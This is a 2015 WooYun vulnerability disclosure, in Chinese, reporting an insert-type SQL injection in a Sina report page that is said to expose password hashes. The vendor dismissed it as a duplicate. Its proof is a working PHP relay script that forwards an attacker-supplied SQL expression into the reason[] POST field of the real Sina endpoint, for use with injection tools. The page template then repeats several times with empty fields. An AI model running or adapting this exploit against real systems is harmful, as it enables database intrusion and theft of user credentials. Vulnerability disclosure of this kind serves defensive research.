新浪某业务存在一处隐蔽的SQL注入（insert型注射获取密码hash） | wooyun-2015-095764

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-095764

漏洞标题：

新浪某业务存在一处隐蔽的SQL注入（insert型注射获取密码hash）

漏洞详情

披露状态：

2015-02-05：细节已通知厂商并且等待厂商处理中
2015-02-06：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

没想到这里也有注入( ⊙ o ⊙ )！

详细说明：

http://im.sina.com.cn/report.php?type=1&uid=1&retcode=0
这个地方是举报的页面

一不小心就漏了

漏洞证明：

<?php
 function do_post_request($url, $data, $optional_headers = null)
  {
     $params = array('http' => array(
                  'method' => 'POST',
                  'content' => $data
               ));
     if ($optional_headers !== null) {
        $params['http']['header'] = $optional_headers;
     }
     $ctx = stream_context_create($params);
     $fp = @fopen($url, 'rb', false, $ctx);
     if (!$fp) {
        throw new Exception("Problem with $url, $php_errormsg");
     }
     $response = @stream_get_contents($fp);
     if ($response === false) {
        throw new Exception("Problem reading data from $url, $php_errormsg");
     }
     return $response;
  }
  $data = "uploadFile=123456&content=111111&gid=123456&fid=123456&addr_url=123456&report_object=1268896683&type=1&reason%5B%5D=a' and 1=".$_GET['sql']." or '";
  echo do_post_request('http://im.sina.com.cn/report.php?type=1&uid=1&retcode=0',$data);
?>

中转一下

修复方案：

版权声明：转载请注明来源杀器王子@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-02-06 11:31

厂商回复：

此安全问题已经有白帽子通过其它渠道报告过，感谢你对新浪安全的关注。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源杀器王子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 杀器王子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源杀器王子@乌云